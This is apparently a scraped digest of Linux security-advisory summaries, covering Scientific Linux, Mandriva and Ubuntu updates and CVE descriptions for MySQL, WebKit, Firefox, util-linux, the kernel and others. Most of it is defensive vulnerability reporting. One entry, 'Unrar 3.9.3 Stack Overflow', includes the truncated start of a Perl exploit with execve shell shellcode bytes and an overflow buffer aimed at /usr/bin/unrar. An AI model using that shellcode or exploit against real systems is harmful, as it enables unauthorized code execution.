Scientific Linux Security Update : mysql on SL5.x i386/x86_64

It was found that the MySQL PolyFromWKB function did not sanity check Well-Known Binary WKB data. A remote, authenticated attacker could use specially crafted WKB data to crash mysqld. This issue only caused a temporary denial of service, as mysqld was automatically restarted after the crash...

Scientific Linux Security Update : webkitgtk on SL6.x i386/x86_64

Multiple memory corruption flaws were found in WebKit. Malicious web content could cause an application using WebKitGTK+ to crash or, potentially, execute arbitrary code with the privileges of the user running the application. CVE-2010-1782, CVE-2010-1783, CVE-2010-1784, CVE-2010-1785,...

Scientific Linux Security Update : jasper on SL6.x i386/x86_64

JasPer is an implementation of Part 1 of the JPEG 2000 image compression standard. Two heap-based buffer overflow flaws were found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause...

Scientific Linux Security Update : util-linux-ng on SL6.x i386/x86_64

The util-linux-ng packages contain a large variety of low-level system utilities that are necessary for a Linux operating system to function. Multiple flaws were found in the way the mount and umount commands performed mtab mounted file systems table file updates. A local, unprivileged user allow...

Scientific Linux Security Update : firefox on SL4.x, SL5.x i386/x86_64

Several flaws were found in the processing of some malformed web content. A web page containing such malicious content could cause Firefox to crash or, potentially, execute arbitrary code as the user running Firefox. CVE-2008-1233, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237 Several flaws were...

Scientific Linux Security Update : fence on SL4.x i386/x86_64

Insecure temporary file use flaws were found in fenceegenera, fenceapc, and fenceapcsnmp. A local attacker could use these flaws to overwrite an arbitrary file writable by the victim running those utilities via a symbolic link attack. CVE-2008-4192, CVE-2008-4579 This update also fixes the...

Design/Logic Flaw

The imalsmruleinit function in security/integrity/ima/imapolicy.c in the Linux kernel before 2.6.37, when the Linux Security Modules LSM framework is disabled, allows local users to bypass Integrity Measurement Architecture IMA rules in opportunistic circumstances by leveraging an administrator's...

Mandriva Linux Security Advisory : java-1.6.0-openjdk (MDVSA-2012:095)

Multiple security issues were identified and fixed in OpenJDK icedtea6 : - S7079902, CVE-2012-1711: Refine CORBA data models - S7143617, CVE-2012-1713: Improve fontmanager layout lookup operations - S7143614, CVE-2012-1716: SynthLookAndFeel stability improvement - S7143606, CVE-2012-1717:...

Mandriva Linux Security Advisory : ffmpeg (MDVSA-2012:075)

Multiple vulnerabilities has been found and corrected in ffmpeg : The Matroska format decoder in FFmpeg does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted file CVE-2011-3362, CVE-2011-3504. cavsdec.c in libavcodec in FFmpeg allows remote...

MDVA-2012:031 : mysql

This is a maintenance and bugfix release that upgrades mysql to the latest respective version which resolves various upstream bugs. %NASLMINLEVEL 70300 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a security fix. Disabled on 2012/09/06. C Tenable Network...

util-linux: mount fails to anticipate RLIMIT_FSIZE

mount in util-linux 2.19 and earlier attempts to append to the /etc/mtab.tmp file without first checking whether resource limits would interfere, which allows local users to trigger corruption of the /etc/mtab file via a process with a small RLIMITFSIZE value, a related issue to CVE-2011-1089...

[USN-1364-1] Linux kernel (OMAP4) vulnerabilities

========================================================================== Ubuntu Security Notice USN-1364-1 February 13, 2012 linux-ti-omap4 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its...

Mandriva Linux Security Advisory : apr (MDVSA-2012:019)

A vulnerability has been found and corrected in ASF APR : tables/aprhash.c in the Apache Portable Runtime APR library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service CP...

MDVA-2011:093-1 : psmisc

This is a bugfix and maintenance update of the psmisc packages that addresses the following issues: Fixed bug with fuser is returning an incorrect return value when using -s option 64846 Update: Packages for 2010.2 is also being provided. %NASLMINLEVEL 70300 @DEPRECATED@ This script has been...

Ubuntu 10.04 LTS : linux-lts-backport-natty vulnerabilities (USN-1256-1)

It was discovered that the /proc filesystem did not correctly handle permission changes when programs executed. A local attacker could hold open files to examine details about programs running with higher privileges, potentially increasing the chances of exploiting additional vulnerabilities...

Linux - Means Freedom [The Hacker News Magazine] October 2011 Issue Released

Linux - Means Freedom The Hacker News Magazine October 2011 Issue Released Dear Readers, We here at The Hacker News were very humbled to be given the opportunity to celebrate 10 millions hits to the website. Wow! We are so very grateful for your support and as I told you last month, I don't think...

Linux - Means Freedom [The Hacker News Magazine] October 2011 Issue Released

Linux - Means Freedom The Hacker News Magazine October 2011 Issue Released Dear Readers, We here at The Hacker News were very humbled to be given the opportunity to celebrate 10 millions hits to the website. Wow! We are so very grateful for your support and as I told you last month, I don't think...

Unrar 3.9.3 Stack Overflow

!/usr/bin/perl =head1 TITLE Winrar http://www.shell-storm.org/shellcode/files/shellcode-752.php use constant SHELLCODE = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" . "\x73\x68\x68\x2f\x62\x69\x6e\x89" . "\xe3\xb0\x0b\xcd\x80"; use constant BUFF = '-' . '3lrvs' x 820; $pname = "/usr/bin/unrar"; die "-File...

Mandriva Linux Security Advisory : krb5-appl (MDVSA-2011:117)

A vulnerability was discovered and corrected in krb5-appl : ftpd.c in the GSS-API FTP daemon in MIT Kerberos Version 5 Applications aka krb5-appl 1.0.1 and earlier does not check the krb5setegid return value, which allows remote authenticated users to bypass intended group access restrictions, an...

Linux DBus-GLib / NetworkManager / ModemManager privilege escalation

Access flags for exported object are not checked...